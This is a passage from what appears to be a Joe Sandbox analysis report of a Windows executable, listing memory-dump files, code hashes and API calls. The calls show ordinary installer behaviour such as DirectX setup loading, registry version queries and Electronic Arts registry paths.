                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: eb3cdc6c5b8b33e03fb0fea420550753fcb1492670a90c7a843143265736801c
                                                                                                                        • Instruction ID: 1d0873b6c68d4a3a9ea03aa7d0c486147177f922c78f51b52919fd013a03fec0
                                                                                                                        • Opcode Fuzzy Hash: eb3cdc6c5b8b33e03fb0fea420550753fcb1492670a90c7a843143265736801c
                                                                                                                        • Instruction Fuzzy Hash: 72318BF3C102509FF7148AA0DC94AF77BB9EB41320F29417BE84DE6282E57C4EC18662
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cf73529e59ca414800e33f6a3d27a469329b2531af2a4a51d0323622b91f33b1
                                                                                                                        • Instruction ID: a48938021cedc7cb95ed12bdda6726682a3cd92a75fd720a002f5d4c608c8565
                                                                                                                        • Opcode Fuzzy Hash: cf73529e59ca414800e33f6a3d27a469329b2531af2a4a51d0323622b91f33b1
                                                                                                                        • Instruction Fuzzy Hash: 6331D636A6C4A302D348DE3ADC002737793CBC662AB1DC5B4C684D761AD53FA8439394
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 916adc14e561b3eadea8d50eb96866212fb6a3d63354d9611c4e08656ecd61d3
                                                                                                                        • Instruction ID: e4babc745da3f29cc0684a555394302970eda1ca2e39a57ede709b7d6887d096
                                                                                                                        • Opcode Fuzzy Hash: 916adc14e561b3eadea8d50eb96866212fb6a3d63354d9611c4e08656ecd61d3
                                                                                                                        • Instruction Fuzzy Hash: 0731FB327002149BDB10DF69EC80967BBA5FB84320F85816AED19CB245D735F915C7E1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                          • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                          • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                          • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                          • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000400,?,Version,?,?,80000002,?,?,?,?), ref: 00417198
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 004171A8
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,dsetup.dll,?,?,?,?), ref: 004171C8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$Current$AddressLibraryLoadPathProcSystemTempWindows
                                                                                                                        • String ID: %d.%d.%d$%d.%d.%d.%d$8.1$CD NEWER THAN HD$CD OLDER THAN HD$CD SAME AS HD$Software\Microsoft\DirectX$UNKNOWN$Version$Windows 2000$Windows XP$dsetup.dll$m_DirectXSetupGetVersion is NULL$oops
                                                                                                                        • API String ID: 3989195010-3706638769
                                                                                                                        • Opcode ID: 4f7dd495da0e88cbd4bd1521b7c72d64d317f7bf7d4b1a0ada1672d325655e65
                                                                                                                        • Instruction ID: 82d168655b0c159cb1636abc6d3beedafcc5df099369e82530c6fe2580bb6615
                                                                                                                        • Opcode Fuzzy Hash: 4f7dd495da0e88cbd4bd1521b7c72d64d317f7bf7d4b1a0ada1672d325655e65
                                                                                                                        • Instruction Fuzzy Hash: 19A1A07560C380ABE324DB54C840BEBB7F9EBD5711F10491EF985932C1DB78A889CB5A
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Internet Explorer,00000000,00020019,?), ref: 00415C61
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,Version,00000000,00000000,?,?), ref: 00415C92
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,IVer,00000000,00000000,?,?), ref: 00415D29
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00415E54
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$CloseOpen
                                                                                                                        • String ID: %d.%d$100$101$102$103$1215$1300$Build$IVer$Software\Microsoft\Internet Explorer$Version
                                                                                                                        • API String ID: 1586453840-2685558121
                                                                                                                        • Opcode ID: 5c89114449e6bc325828eae396e07a57128cb86573d4cfcd060cf77c0c08b7f8
                                                                                                                        • Instruction ID: de899b3a32cb2af15eaa5d18eb6ecfaec54b5d6c66715f52551f9a2aa385845c
                                                                                                                        • Opcode Fuzzy Hash: 5c89114449e6bc325828eae396e07a57128cb86573d4cfcd060cf77c0c08b7f8
                                                                                                                        • Instruction Fuzzy Hash: 4861D3B1A047459BEB20DF14D844BEB7BE9EBC8704F144429F6449B380DB789945CB9B
                                                                                                                        APIs
                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00416955
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?), ref: 00416969
                                                                                                                        • LoadLibraryA.KERNEL32(dsetup.dll), ref: 00416981
                                                                                                                        • GetProcAddress.KERNEL32(00000000,DirectXSetupA), ref: 0041699A
                                                                                                                        • GetProcAddress.KERNEL32(?,DirectXSetupGetVersion), ref: 004169BE
                                                                                                                        • GetProcAddress.KERNEL32(?,DirectXSetupGetEULAA), ref: 004169E2
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?), ref: 004169EC
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?), ref: 00416A18
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory$AddressProc$LibraryLoad
                                                                                                                        • String ID: Cannot get address of DirectXSetupA$Cannot get address of DirectXSetupGetVersion$Could not load dsetup.dll$DirectXSetupA$DirectXSetupGetEULAA$DirectXSetupGetVersion$Dsetup.dll$dsetup.dll
                                                                                                                        • API String ID: 3383375925-590746012
                                                                                                                        • Opcode ID: 6728013ffcc9761fc737054107d104eea82b8e14e575de02be08ca56f5759ead
                                                                                                                        • Instruction ID: 931795e1dae7218fb21f2bd96e0d81854005b1a274691680fd43d5dea92e8a10
                                                                                                                        • Opcode Fuzzy Hash: 6728013ffcc9761fc737054107d104eea82b8e14e575de02be08ca56f5759ead
                                                                                                                        • Instruction Fuzzy Hash: 2421F5B52413006FE320AB64AD85F9BB7A8DB95B11F11892FFE85D3281DA78D444CB39
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(USER32), ref: 00422BAD
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00422BC9
                                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00422BDA
                                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00422BEB
                                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00422BFC
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00422C0D
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00422C1E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 00422C2F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                        • API String ID: 667068680-68207542
                                                                                                                        • Opcode ID: 810a936632be2ce720fafd58cbae2f49093b75e770282222fd5374265a0f73c0
                                                                                                                        • Instruction ID: f307c977e25abfbff0b048e106a8ea6a6bb34d05222bffd66cc64a19540436b9
                                                                                                                        • Opcode Fuzzy Hash: 810a936632be2ce720fafd58cbae2f49093b75e770282222fd5374265a0f73c0
                                                                                                                        • Instruction Fuzzy Hash: 9D215471A21721AB87959F767EC052FBAF4F649B853A0483FE804E2661C7B88049DF5C
                                                                                                                        APIs
                                                                                                                        • GetShortPathNameA.KERNEL32(?,?,00000400), ref: 004107BD
                                                                                                                        • GetLastError.KERNEL32(00000400,?,00000000,00000000,80000002,?,80000002,?), ref: 00410858
                                                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 00410866
                                                                                                                        • LocalFree.KERNEL32(?), ref: 0041088D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatFreeLastLocalMessageNamePathShort
                                                                                                                        • String ID: DirectX Installed$Game Registry$Installed From$Language$Registration$Restart$SOFTWARE\$SOFTWARE\Electronic Arts\%s\%s\ergc$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\$\$can't read setRestartFlag
                                                                                                                        • API String ID: 3903020775-341092691
                                                                                                                        • Opcode ID: 3d2759c5747e591e863665242978f06756fe076df6fdbafd9d5ebf5856d5d1e5
                                                                                                                        • Instruction ID: 5a2e11cbfe557d20dc58b77cc88c52bee8573eb501d7b283b44b6156cc505af9
                                                                                                                        • Opcode Fuzzy Hash: 3d2759c5747e591e863665242978f06756fe076df6fdbafd9d5ebf5856d5d1e5
                                                                                                                        • Instruction Fuzzy Hash: A69122712083429BD714DF24C811BFBB7E1FBD5704F004A2EF99597280DBB9A889C799
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32 ref: 00413B5A
